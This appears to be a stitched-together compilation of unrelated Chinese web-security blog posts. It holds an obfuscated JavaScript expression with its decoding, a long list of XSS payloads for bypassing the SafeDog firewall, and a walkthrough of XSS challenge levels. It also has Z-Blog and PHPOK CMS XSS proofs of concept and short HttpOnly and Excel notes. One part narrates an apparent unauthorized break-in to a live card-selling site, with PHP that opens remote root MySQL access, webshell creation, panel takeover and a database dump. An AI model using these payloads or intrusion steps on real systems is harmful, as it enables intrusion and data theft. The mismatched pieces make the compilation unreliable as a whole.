[][`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${{}}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}`][`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${{}}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}`](`${`${!![][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[!!{}<<!![]]}${`${![][~[]]}`[(!![]<<!![])|!![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!{}<<![]]}(${!!{}<<![]})`)()

首先复制全部到谷歌中尝试运行 其实是构造了一个函数

把代码分成三部分 

依次查看内容 

实际执行的语句为 

再次分割（拿第一部分为例） 

取第一部分为例 

那么为什么会是C

列出基础字符 

峰回路转

对比字母为C的和基础字符，发现一开始是一样的，那么后面的[!![]<<!![]<<!![]|!![]]是什么 

是一个数组的格式，结合基础字符查看，相当于${{}[5] ${{}内容为[object Object] 相当于[object Object]里面的第五个字符，就是c

核心@X1r0z原创，总是有惊奇的脑回路。

ref-xss

绕过 payload 格式
<[WORD] on[EVENT]=[EVAL]>[TEXT]
在随机单词的标签内加上 on 事件, 最后在标签外加上文本.

因为 html 的松散性, 导致<sb>sb</sb> 都能被解析成标签, 并且支持触发类似于onclick onmouseover 的事件

特别小众的标签也可以绕过安全狗的规则, 比如acronym address 翻翻 w3c 的教程能找出好多

dom-xss

安全狗不存在 dom-xss 的拦截规则

基本上没有尖括号就可以绕过了, 或者使用上面的 payload

由于上下文是在 JavaScript 的环境内, 会有很多的变形

";alert(0);//
";document.write("\u003cscript\u003ealert(0)\u003c\u002fscript\u003e");//

总之先闭合 然后直接弹窗 or 用docment.write 写标签

payloads

<a onclick="javascript:alert(0)">a
<javascript onclick="javascript:alert(0)">a
<b onclick="javascript:alert(0)">a
<abbr onclick="javascript:alert(0)">a
<acronym onclick="javascript:alert(0)">a
<address onclick="javascript:alert(0)">a
<applet onclick="javascript:alert(0)">a
<article onclick="javascript:alert(0)">a
<xss onclick="javascript:alert(0)">a
<aside onclick="javascript:alert(0)">a
<bdi onclick="javascript:alert(0)">a
<bdo onclick="javascript:alert(0)">a
<big onclick="javascript:alert(0)">a
<button onclick="javascript:alert(0)">a
<del onclick="javascript:alert(0)">a
<details onclick="javascript:alert(0)">a
<div onclick="javascript:alert(0)">a
<dfn onclick="javascript:alert(0)">a
<dl onclick="javascript:alert(0)">a
<dt onclick="javascript:alert(0)">a
<h1 onclick="javascript:alert(0)">a
<h2 onclick="javascript:alert(0)">a
<h3 onclick="javascript:alert(0)">a
<h4 onclick="javascript:alert(0)">a
<h5 onclick="javascript:alert(0)">a
<h6 onclick="javascript:alert(0)">a
<header onclick="javascript:alert(0)">a
<hr onclick="javascript:alert(0)">a
<html onclick="javascript:alert(0)">a
<kbd onclick="javascript:alert(0)">a
<map onclick="javascript:alert(0)">a
<mark onclick="javascript:alert(0)">a
<menu onclick="javascript:alert(0)">a
<menuitem onclick="javascript:alert(0)">a
<meter onclick="javascript:alert(0)">a
<q onclick="javascript:alert(0)">a
<var onclick="javascript:alert(0)">a
<xmp onclick="javascript:alert(0)">a
<addons onclick="javascript:alert(0)">a
<ascii onclick="javascript:alert(0)">a
<aspx onclick="javascript:alert(0)">a
<java onclick="javascript:alert(0)">a
<mobile onclick="javascript:alert(0)">a
<go onclick="javascript:alert(0)">a
<alibaba onclick="javascript:alert(0)">a
<baidu onclick="javascript:alert(0)">a
<google onclick="javascript:alert(0)">a
<github onclick="javascript:alert(0)">a
<acu onclick="javascript:alert(0)">a
<mail onclick="javascript:alert(0)">a
<a onmouseover="javascript:alert(0)">a
<javascript onmouseover="javascript:alert(0)">a
<b onmouseover="javascript:alert(0)">a
<abbr onmouseover="javascript:alert(0)">a
<acronym onmouseover="javascript:alert(0)">a
<address onmouseover="javascript:alert(0)">a
<applet onmouseover="javascript:alert(0)">a
<article onmouseover="javascript:alert(0)">a
<xss onmouseover="javascript:alert(0)">a
<aside onmouseover="javascript:alert(0)">a
<bdi onmouseover="javascript:alert(0)">a
<bdo onmouseover="javascript:alert(0)">a
<big onmouseover="javascript:alert(0)">a
<button onmouseover="javascript:alert(0)">a
<del onmouseover="javascript:alert(0)">a
<details onmouseover="javascript:alert(0)">a
<div onmouseover="javascript:alert(0)">a
<dfn onmouseover="javascript:alert(0)">a
<dl onmouseover="javascript:alert(0)">a
<dt onmouseover="javascript:alert(0)">a
<h1 onmouseover="javascript:alert(0)">a
<h2 onmouseover="javascript:alert(0)">a
<h3 onmouseover="javascript:alert(0)">a
<h4 onmouseover="javascript:alert(0)">a
<h5 onmouseover="javascript:alert(0)">a
<h6 onmouseover="javascript:alert(0)">a
<header onmouseover="javascript:alert(0)">a
<hr onmouseover="javascript:alert(0)">a
<html onmouseover="javascript:alert(0)">a
<kbd onmouseover="javascript:alert(0)">a
<map onmouseover="javascript:alert(0)">a
<mark onmouseover="javascript:alert(0)">a
<menu onmouseover="javascript:alert(0)">a
<menuitem onmouseover="javascript:alert(0)">a
<meter onmouseover="javascript:alert(0)">a
<q onmouseover="javascript:alert(0)">a
<var onmouseover="javascript:alert(0)">a
<xmp onmouseover="javascript:alert(0)">a
<addons onmouseover="javascript:alert(0)">a
<ascii onmouseover="javascript:alert(0)">a
<aspx onmouseover="javascript:alert(0)">a
<java onmouseover="javascript:alert(0)">a
<mobile onmouseover="javascript:alert(0)">a
<go onmouseover="javascript:alert(0)">a
<alibaba onmouseover="javascript:alert(0)">a
<baidu onmouseover="javascript:alert(0)">a
<google onmouseover="javascript:alert(0)">a
<github onmouseover="javascript:alert(0)">a
<acu onmouseover="javascript:alert(0)">a
<mail onmouseover="javascript:alert(0)">a

最短 xss 平台的题目, 一共20关.

19关和20关没做, 都是 xsf, 之前审计过 flash 文件也没啥好印象.

这个相对于之前的 xss challenges 真是一点 Hint 都没有, 不过可以显示出 payload 的长度.

level 1

最简单的

<svg onload=alert(0)>

level 2

输出在 value 内, 闭合标签后再插入 payload

也可以用 on 事件, 不过这是下一题的考点

"><img src=0 onerror=alert(0)>

level 3

单引号闭合

1' onmouseover='alert(0)

level 4

双引号闭合

" onmouseover="alert(0)

level 5

on 事件被转义成 o_n, script 标签也被转义成 scr_ipt

换一个姿势

"><a href=javascript:alert(0)>

level 6

on href src 都被加上了下划线

大小写绕过

<a HrEf="javascript:alert(0)">click</a>

level 7

这题没有转义, 只是把 on href src script 替换成空, 但只替换了一次

"><a hrhrefef="javascscriptript:alert(0)">click</a>

level 8

关键字都被加上了下划线, 用 html 的自解码机制就可以绕过

javascript:alert(0)

level 9

keyword 中没有 http:// 就显示为非法链接

其它的都和上题一样

javascript:alert("http://&/#34;)

level 10

查看源代码发现有三个隐藏参数, t_link t_history t_sort, 其中只有 t_sort 可控

由于标签是 hidden 的就不能触发 on 事件, 所以要改回 text 状态

1" type="text" onmouseover="alert(0)

level 11

隐藏参数多了个 t_referer, 抓包修改 referer 即可

1" type="text" onmouseover="alert(0)

level 12

抓包修改 user-agent

1" type="text" onmouseover="alert(0)

level 13

打开后发现多了个 cookie user=call me maybe, 直接修改 cookie 重新访问页面

1" type="text" onmouseover="alert(0)

level 14

这题做的很迷, 打开后直接就是 401 认证, 乱输几个 payload 也没屌用

在网上看了 writeup 后才发现是图片 exif 信息的 xss

估计网站已经关闭了, 就直接跳过吧

level 15

查看源代码发现 ng-include 这个参数, 百度一会发现这是 angularjs 的语句, 好像和 php 的文件包含差不多

src 直接包含第一关的内容传参 keyword 为 payload, 并没啥屌用, 后来才发现是 script 标签包含 angularjs 所在的网站被墙了, 恰好又是我大谷歌的地址

包含的时候要加上单引号

'level1.php?keyword=<svg onload=alert(0)>'

level 16

反斜杠空格什么的都被替换成了  , 两个换行符就可以干掉它

<svg%0a%0aonload=alert(0)>

level 17

写的是 xsf, 其实只要在 arg02 后面加上 payload 就行了

1 onmouseover=alert(0)

level 18

同 level 17

1 onmouseover=alert(0)

level 19 level 20

这两关的 swf 文件明显比之前那两个假的大好多啊.

懒得一批

今天看了《白帽子讲web安全》一书，顺便记录一下，HttpOnly的设置

httponly的设置值为 TRUE 时，使得Javascript无法获取到该值，有效地防御了XSS打管理员的 cookie

这里以本博客作为测试对象，实现了一下。

找到网站 /include/lib/loginauth.php 文件，如下修改：

这里解释一下：在PHP>5.2版本中支持HttpOnly设置，可以直接在php.ini文件中设置，个人不推荐这种方式，推荐如上图所述在设置cookie时设置。

setcookie() 这个函数现支持7个参数，第七个参数是设置 httponly 的属性，第六个是是否开启 https 传输。

这样设置以后，就能有效地防止XSS获取用户的重要cookie信息。

效果如下：

使用alert(document.cookie)在控制台弹窗一下，发现并没有我们的登录信息cookie键值对：

注意：httponly只是阻止了js获取httponly值为true所对应的cookie键值队，并不能拦截XSS，想要拦截XSS除了浏览器的filter以外，更多的是程序本身做好参数的过滤。

1. 概述

微软为 Excel 增加了使用 JavaScript 编写自定义函数的支持。

1. 示例

比如一个功能：两数之和加 42：

我们可以使用 JavaScript 编写：

function ADD42(a, b) {
    return a + b + 42;
}

然后就像使用其它 Excel 内置函数一样，这样调用：

=CONTOSO.ADD42(1,2)

1. 注意事项

这个功能还没有在正式版发布。

Custom [JavaScript] functions are now available in Developer Preview on Windows, Mac, and Excel Online

我们可以通过安装 Office (build 9325 on Windows or 13.329 on Mac) 并加入 Office Insider（默认这个特性是禁用的，只有加入了 Insider 才会开启）。
在 GitHub 上 clone 这个 repo OfficeDev/Excel-Custom-Functions，按照 Readme 文件可以体验此功能，或者直接在 Excel 中编写 JavaScript 自定义函数。

以后利用office怕是连脚本宏都不用了，直接js挖矿

poc:

ZC_BLOG_SUBNAME参数的POC:

http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f

post_data:

ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

ZC_UPLOAD_FILETYPE 参数的POC:

post_data:

ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek">alert(1)ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

原文地址

一开始是奔着dz去的，注册了个账号，想试一下任意文件删除然后重装getshell，当然。。。失败了。。最新版dz。

然后有个老铁说有个旁站，是一个发卡平台，抄出我的google大法搜到了别人破解的源码。 然后丢到环境里搭起来晾着。

nmap扫端口扫到了两个开放http的端口一个是88，一个是888.

打开后发现888是宝塔的管理面板。

当时我就装了个宝塔打算巴拉巴拉一波，静态跑一遍之后忽然想起今天要上班还是不看宝塔了，转而去发卡平台源码巴拉巴拉。

上代码审计工具看了下，没有过滤，注入是肯定有的，但是我并不想注入。。。因为。。。我不会mysql。。。

随便贴张图吧

那么问题来了，注入不搞的话怎么去getshell或者弄管理员密码呢？

全部巴拉巴拉了一遍源码之后发现一个文件没有校验登陆状态。唔。。。没错 那是个ajax.php

只要参数正确就可以传递内容过去。

这是密码修改的后端代码

请求大概是这样

就这样我们修改成功了。。。。

然后就是怎么get个shell。。。

看了几个功能之后觉得可以试试上传文件。。但是上传绕过太烦。。

代码如下

这时看到了一个echo的东西。。。这是个很重要的突破点

代码如下

之前我们说过这个程序没有过滤之类的操作，

so。。看一下这个emailconfig.php是长什么样

我突然想到了存储型xss，从存储型xss想到了前后代码补全get个shell。。。

先搓一个五毛钱的phpinfo

提交之后返回修改邮件的标签可以发现如下情况

ojbk再搓一个一块钱的shell

然而很不幸的是。。。500错误了。。。在看了一下phpinfo打印的信息发现。。。

全都GG了。。

这种情况很尴尬。。。非常的尴尬。。。

欣赏了一会音乐之后想起我为什么不读一下文件试试？毕竟mysql是开放的，于是乎。。。去读了dz的配置文件

还行啦这玩意居然是root账号。。。

当时我就操出我的mysql udf准备扫操作一波。。。但是忽然发现root不能远程登陆。。于是再搓一个远程登陆的查询语句

$link=@mysqli_connect('localhost','root','root');mysqli_select_db($link,'mysql');mysqli_set_charset($link,'utf8');mysqli_query($link,"update user set host = '%'where user= 'root';");mysqli_query($link,"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION;");mysqli_query($link,"flush privileges;");

大概是这样 ，然后刷新一下php页面就能远程连接了。

这时我还要读一下目录看看plugin文件夹在不在。。。于是又搓了一个读文件夹的代码

print_r(glob($_GET['id']. '/*' , GLOB_ONLYDIR));
唔。。事实证明并没有plugin目录。。。gg。。

这时我又继续听歌。。突然我想起这玩意目录里有个aspnet_client

能不能搓个asp？

于是又搓了一行代码用来创建asp文件

file_put_contents('one.asp', '');
于是。。生成了一个asp的shell。。访问成功

这时。。。开始创建个mysql的plugin目录用于传udf。。。然而折腾了一会之后发现udf加载失败。。。头大。。。放弃这个方案。

这是我们开始打宝塔的主意，

巴拉巴拉找到了宝塔的数据库文件。。是个sqli。。直接打开发现是MD5加密的密码。。。。唔。。。cmd5查不到。。。

突然间我又突发奇想。。。宝塔的网站目录能不能读？

事实证明是可以的。。。

于是去看了下login.php

唔。。。直接改登陆认证。。。

然后就登陆上了宝塔的面板。。。。

翻了一圈没找到个执行命令的地方 有个计划任务还不执行。。这就很蛋疼。。。

抽了两根烟。。又翻了下宝塔的文件夹。。。突然灵光一现。。这TM宝塔还有个独立的php环境。。。搓开php.ini发现没有过滤。。。。ojbk直接传个php到宝塔面板根目录

我们终于从iis_user变成了system。。。

唔。。接下来就简单了。。。创个用户。。远程登陆。。。脱裤脱源码。。。。收工

PHPOKCMS这是一套允许用户高度自由配置的企业站程序，基于LGPL协议开源授权！CMS拥有直观、简洁、轻松愉悦的后台管理 ，完善的功能模块，强大的SEO搜索优化 及营销功能。根据黑盒+白盒的方式进行挖掘漏洞，黑盒思路发现漏洞，白盒方式审计漏洞。当前版本为PHPOKCMS 4.8，漏洞为CNVD-C-2016-81241。

1.2 发现漏洞

首先进入后台页面，然后找到关于我们进行编辑，如图1所示。

根据页面中的代码，可得知页面进行HTML实体的转换。我将发送的数据包截获，并且修改为URL编码后的JS代码，如图2所示；URL编码前代码如图3所示。


在页面中成功执行JS代码，如图4所示。

查看页面JS代码，如图5所示。

根据发现漏洞，采用白盒审计的方法，递进查看漏洞产生原因。

1.3浏览存在漏洞的代码

后台管理中关于我们页面的代码，如图6所示：
/data/tpl_admin/1_list_edit.php 第27行。

页面是采用动态的生成方式，继续查看页面解析的代码，如图7所示

继续追踪传递参数到ok_f()，如图8所示：
/framework/admin/list_control.php 755行。

紧接着执行存储方法，如图9所示：
/framework/admin/list_control.php 858行。

存储语句执行，如图10 所示：
/framework/model/admin/ext_model.php

1.4总结

在页面中进行HTML实体转换，显然不是十分的妥善的。通过一些方法可以绕过。

感谢网友@vr_system投稿